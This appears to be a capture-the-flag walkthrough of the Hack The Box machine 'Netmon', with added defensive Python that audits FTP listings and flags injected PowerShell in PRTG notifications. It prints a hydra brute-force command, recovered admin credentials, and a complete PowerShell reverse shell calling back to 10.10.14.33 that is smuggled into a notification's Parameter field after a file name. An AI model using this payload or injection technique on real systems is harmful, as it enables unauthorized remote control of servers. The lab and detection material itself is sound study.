Netmon
Easy box from HTB; quite frankly, the user flag could have been hidden a bit better. Enumerating the FTP server to find the old .bak configuration files was the real challenge. The RCE at the end was basic.
Learning:
Enumeration on FTP
Credential Hunt
Executing RCE manually or using msfconsole
Enumeration
nmap 10.129.230.176
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-25 13:06 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.029s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
Check FTP (service detection and default scripts on port 21):
└─$ nmap 10.129.230.176 -p 21 -A
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-25 13:08 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT

user.txt can be found in the Public user's folder when you navigate through the FTP share:
cat user.txt
6cf59125ff605c57eb6dc38a3b9cfce5
Enumerating FTP to obtain user credentials:
Goal: attempt to find old .bak files and old config files
Users seen so far:
netmon\administrator
Brute-force attempt against the PRTG web login with hydra - did not work:
hydra -l prtgadmin -P /usr/share/wordlists/rockyou.txt 10.129.230.176 http-post-form "/public/checklogin.htm:username=^USER^&password=^PASS^&loginurl=:Your login has failed"
Navigating the FTP share again, looking for credentials:
cd "Program Files (x86)\PRTG Network Monitor\"
# Nothing worth the time in that directory
cd "Program Files (x86)\Windows"
# From Program Files we are heading to Windows
02-25-19 09:54PM 1189697 PRTG Configuration.dat
Note: user common UID 100

Obtained from /ProgramData/Paessler/PRTG Network Monitor:
get PRTG Configuration.old.bak
User credentials found in the old backup:
User: prtgadmin
Pass: PrTg@dmin2019
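The two findings above (anonymous FTP rooted at the system drive, and a stale configuration backup sitting next to the live config) are what a defender should be checking for. The following added example is mine, not part of the original write-up or of PRTG: it parses MS-DOS style FTP directory listings (the format Microsoft ftpd returns, as seen in the nmap ftp-anon output) and flags a root listing that looks like a Windows system drive, plus any backup-suffixed files. The PRTG directory listing is a constructed sample built from the file names in the write-up; its sizes and timestamps are made up.

```python
"""Audit anonymous-FTP directory listings for two misconfigurations:
the FTP root exposing a Windows system drive, and config backups left
readable next to the live configuration. Added example, not PRTG code."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Microsoft ftpd "MS-DOS style" LIST line, e.g.
#   02-25-19 09:15PM       <DIR>          inetpub
#   02-02-19 11:18PM                 1024 .rnd
LISTING_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?P<size><DIR>|\d+)\s+(?P<name>.+?)\s*$"
)

# Top-level names that normally exist only at the root of a Windows system drive.
SYSTEM_ROOT_NAMES = {"windows", "users", "program files", "program files (x86)",
                     "perflogs", "programdata", "inetpub"}
# Suffixes that usually mean "stale copy of a config file".
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".backup")


@dataclass
class Entry:
    name: str
    is_dir: bool
    size: int  # 0 for directories


def parse_listing(text: str) -> list[Entry]:
    """Parse MS-DOS style LIST output; lines that do not match are skipped."""
    entries: list[Entry] = []
    for raw in text.splitlines():
        # nmap's ftp-anon script prefixes each line with "| " or "|_"; strip that.
        line = re.sub(r"^\|_?\s*", "", raw.strip())
        m = LISTING_RE.match(line)
        if not m:
            continue
        is_dir = m["size"] == "<DIR>"
        entries.append(Entry(m["name"], is_dir, 0 if is_dir else int(m["size"])))
    return entries


def audit(entries: list[Entry]) -> dict:
    """Report system-drive exposure (two or more root names) and backup files."""
    names = {e.name.lower() for e in entries}
    root_hits = sorted(n for n in names if n in SYSTEM_ROOT_NAMES)
    backups = sorted(e.name for e in entries
                     if not e.is_dir and e.name.lower().endswith(BACKUP_SUFFIXES))
    return {
        "system_root_exposed": len(root_hits) >= 2,
        "system_root_names": root_hits,
        "backup_files": backups,
    }


# Root listing exactly as nmap's ftp-anon script printed it in this write-up.
ROOT_LISTING = """\
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
"""

# Constructed sample of the PRTG data directory (sizes/times are made up).
PRTG_DIR_LISTING = """\
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 10:01PM 1153755 PRTG Configuration.old.bak
"""

if __name__ == "__main__":
    for label, text in (("FTP root", ROOT_LISTING), ("PRTG data dir", PRTG_DIR_LISTING)):
        print(label, audit(parse_listing(text)))
```

Run it against a saved `ls` transcript or the ftp-anon section of an nmap scan; a root listing that trips `system_root_exposed` means the FTP site's physical path is the system drive rather than a dedicated share, and any entry in `backup_files` is a file that should not be reachable by an anonymous login at all.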
RCE
Shell attempt with the Metasploit module:
windows/http/prtg_authenticated_rce

Another way of obtaining RCE
In the PRTG admin panel head to:
Setup
Account Settings
Notifications
Inside the notification settings head to Execute Program
Execute Program setting:
tes.txt;$client = New-Object System.Net.Sockets.TCPClient('10.10.14.33',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
In the Parameter field input the rev-shell
Make sure you select
Demo exe notification - outfile.ps1
in the Program File parameter, then Save
Create a netcat listener: `nc -lvnp 1234`
Once saved, head to Notifications
Click our created notification name
pwn
On the far right-hand side you will see a small box with a pen; click that
Click the bell (if you hover over it, it will say "send notification")
RCE done!
Follow the block dots if lost
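The technique above works because the notification's Parameter field is handed to PowerShell as part of a command line, so a value that is supposed to be a file name can carry a chain of statements instead. From the defender's side the useful check is over the notification definitions themselves. The following added example is mine, not the write-up's or PRTG's code: it scores a parameter string against substrings typical of an in-memory PowerShell TCP reverse shell (the same primitives the payload above uses) and flags a "file name" that contains statement separators. The notification list is a constructed sample in a reduced (name, program, parameter) shape, not PRTG's real export format, and the IP in it is a documentation address.

```python
"""Heuristics for spotting abuse of PRTG "Execute Program" notifications:
the Parameter field should hold a plain argument (a file name), not a chain
of PowerShell statements. Added example, not PRTG code."""
from __future__ import annotations

import re

# Substrings typical of a PowerShell TCP reverse shell, with weights.
# PowerShell is case-insensitive, so keys are lowercase and input is lowered.
INDICATORS = {
    "system.net.sockets.tcpclient": 3,
    ".getstream()": 2,
    "iex ": 2,
    "invoke-expression": 2,
    "[text.encoding]::ascii": 1,
    "out-string": 1,
}
# A file-name argument has no reason to contain statement separators or pipes.
SHELL_METACHARS = re.compile(r"[;&|]")
SUSPICIOUS_SCORE = 4


def score_command(text: str) -> int:
    """Sum the weights of every indicator present in the text."""
    low = text.lower()
    return sum(weight for needle, weight in INDICATORS.items() if needle in low)


def check_notification_parameter(param: str) -> dict:
    """Flag a parameter that mixes a separator with shell indicators, or that
    scores high on indicators alone."""
    score = score_command(param)
    has_meta = bool(SHELL_METACHARS.search(param))
    return {
        "has_shell_metachar": has_meta,
        "score": score,
        "suspicious": (has_meta and score > 0) or score >= SUSPICIOUS_SCORE,
    }


def triage(notifications: list[tuple[str, str, str]]) -> list[str]:
    """Return the names of notifications whose parameter looks like injected code."""
    return [name for name, _program, param in notifications
            if check_notification_parameter(param)["suspicious"]]


# Constructed sample (not a real PRTG export): a benign notification that
# writes an alert file, and one whose parameter smuggles PowerShell after
# the file name, in the style of the write-up's "tes.txt;..." payload.
SAMPLE_NOTIFICATIONS = [
    ("disk alert", "Demo exe notification - outfile.ps1", r"C:\Temp\alert.txt"),
    ("pwn", "Demo exe notification - outfile.ps1",
     "tes.txt;$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',1234);"
     "$stream = $client.GetStream();iex $data"),
]

if __name__ == "__main__":
    for name, _program, param in SAMPLE_NOTIFICATIONS:
        print(name, check_notification_parameter(param))
    print("flagged:", triage(SAMPLE_NOTIFICATIONS))
```

A separator on its own is not treated as malicious (some legitimate arguments are lists), which is why the rule requires at least one indicator alongside it; raise or lower `SUSPICIOUS_SCORE` to suit the environment. The same scoring can be applied to process-creation command lines whose parent is the PRTG server process, where a hit on a `powershell.exe` child is worth an immediate look.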

Popped it.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9282597bae369ff9a75033e99ddc5bcd